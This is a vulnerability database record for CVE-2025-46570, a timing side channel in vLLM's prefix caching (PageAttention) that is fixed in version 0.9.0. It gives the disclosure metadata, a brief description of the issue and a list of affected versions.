CVE-2025-46570

Source
https://nvd.nist.gov/vuln/detail/CVE-2025-46570
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-46570.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2025-46570
Aliases
Related
Published
2025-05-29T17:15:21Z
Modified
2025-05-30T21:02:17.817769Z
Summary
[none]
Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

References

Affected packages

Git / github.com/vllm-project/vllm

Affected ranges

Type
GIT
Repo
https://github.com/vllm-project/vllm
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed

Affected versions

Other

submission

v0.*

v0.1.0
v0.1.1
v0.1.2
v0.1.3
v0.1.4
v0.1.5
v0.1.6
v0.1.7
v0.2.0
v0.2.1
v0.2.2
v0.2.3
v0.2.4
v0.2.5
v0.2.6
v0.2.7
v0.3.0
v0.3.1
v0.3.2
v0.3.3
v0.4.0
v0.4.0.post1
v0.4.1
v0.4.2
v0.4.3
v0.5.0
v0.5.0.post1
v0.5.1
v0.5.2
v0.5.3
v0.5.3.post1
v0.5.4
v0.5.5
v0.6.0
v0.6.1
v0.6.1.post1
v0.6.1.post2
v0.6.2
v0.6.3
v0.6.3.post1
v0.6.4
v0.6.4.post1
v0.6.5
v0.6.6
v0.6.6.post1
v0.7.0
v0.7.1
v0.7.2
v0.7.3
v0.8.0rc1
v0.8.0rc2
v0.8.1
v0.8.2
v0.8.3rc1
v0.8.4